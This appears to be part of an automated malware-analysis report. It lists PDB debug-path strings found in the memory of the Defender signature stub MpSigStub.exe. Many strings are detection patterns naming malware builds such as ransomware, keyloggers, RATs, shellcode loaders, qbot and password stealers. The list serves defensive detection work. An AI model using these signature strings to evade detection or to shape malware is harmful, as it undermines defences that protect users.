Source:	Binary string: wbadmin.pdb source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp
Source:	Binary string: *\ClientPlugin\obj\Release\ClientPlugin.pdb source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp
Source:	Binary string: Unite.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: \Release\WCmouiTri.pdb] source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp
Source:	Binary string: z:\Projects\Rescator\uploader\Debug\scheck.pdb] source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp
Source:	Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: Flipopia.pdb source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp
Source:	Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp
Source:	Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp
Source:	Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: d:\young\swprojects\tdxin\bin\amd64\rtdxftex_amd64.pdb source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp
Source:	Binary string: \Black Coding\RAT+BOT\WebServer 2.0\src\Release\WebServer.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
Source:	Binary string: nethtsrv.pdb source: MpSigStub.exe, 00000023.00000003.6270596186.0000028BD6DDB000.00000004.00000001.sdmp
Source:	Binary string: S\\server\\V.\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp
Source:	Binary string: Release\toolbar_setup.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\Narrator.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp
Source:	Binary string: rasautou.pdb source: MpSigStub.exe, 00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp
Source:	Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp
Source:	Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdbac source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
Source:	Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp
Source:	Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp
Source:	Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp
Source:	Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
Source:	Binary string: e:\builddata\Install\source\Min_Loader-BuildAndDeploy\Release\Loader_Resized.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp
Source:	Binary string: tdc.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp
Source:	Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: dxtrans.pdb source: MpSigStub.exe, 00000023.00000003.6265277219.0000028BD7767000.00000004.00000001.sdmp
Source:	Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000023.00000003.6285428567.0000028BD7FBD000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdb source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: KF.+:\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
Source:	Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp
Source:	Binary string: fc.pdb0 source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp
Source:	Binary string: \Gleaned\purecall\win32p6.pdb source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
Source:	Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: E@.+:\\Projects\\tidynet\\Release\\(selfdestruct\|tidynetwork).pdb source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp
Source:	Binary string: EFRE65.pdb source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp
Source:	Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
Source:	Binary string: CryARr.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp
Source:	Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
Source:	Binary string: boteg.pdbxL source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
Source:	Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: SAVService.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp
Source:	Binary string: 7laIR+\|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: wevtutil.pdb source: MpSigStub.exe, 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp
Source:	Binary string: wscript.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: \isn.pdb source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp
Source:	Binary string: C:\\Users\\Lucca\\AppData\\Local\\Temp\\.*\.pdb source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp
Source:	Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp
Source:	Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp
Source:	Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.\\.\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp
Source:	Binary string: \rANSOM\rANSOM\obj\Sanyasteakler\rANSOM.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
Source:	Binary string: megasync.pdb source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
Source:	Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
Source:	Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: vga256.pdb source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp
Source:	Binary string: kernel32.pdb source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
Source:	Binary string: acpi.pdbN source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: Fwizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\FancHuible.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
Source:	Binary string: stscast.pdb source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp
Source:	Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 00000023.00000003.6270596186.0000028BD6DDB000.00000004.00000001.sdmp
Source:	Binary string: winscard.pdb source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp
Source:	Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmp
Source:	Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp
Source:	Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: \ProcExpDriver.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
Source:	Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: Krypton\source\repos\UAC\UAC\obj\Release\UAC.pdb source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdb source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp
Source:	Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp
Source:	Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp
Source:	Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp
Source:	Binary string: security.pdb source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdbaT source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
Source:	Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb3 source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
Source:	Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp
Source:	Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp
Source:	Binary string: :\cef_2883\chromium_git\chromium\src\out\Release_GN_x86\vmxclient.exe.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: nafde.pdb source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmp
Source:	Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
Source:	Binary string: autofmt.pdb source: MpSigStub.exe, 00000023.00000003.6340275863.0000028BD67EC000.00000004.00000001.sdmp
Source:	Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp
Source:	Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
Source:	Binary string: sfc.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp
Source:	Binary string: Uc:\Users\Main\Desktop\PackagingModule\PackagingModule\obj\Release\PackagingModule.pdb] source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
Source:	Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp
Source:	Binary string: c:\Prepare\Control\Work\box\heard.pdb source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp
Source:	Binary string: PassView.pdb source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp
Source:	Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp
Source:	Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp
Source:	Binary string: tdc.pdb3 source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
Source:	Binary string: Tokenvator.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp
Source:	Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp
Source:	Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
Source:	Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb] source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: dsquery.pdb source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp
Source:	Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp
Source:	Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp
Source:	Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp
Source:	Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
Source:	Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp
Source:	Binary string: obj\Debug\WinCalendar.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: subst.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp
Source:	Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp
Source:	Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp
Source:	Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp
Source:	Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
Source:	Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp
Source:	Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
Source:	Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
Source:	Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp
Source:	Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
Source:	Binary string: \Release\mailermodule199.pdb source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp
Source:	Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp
Source:	Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
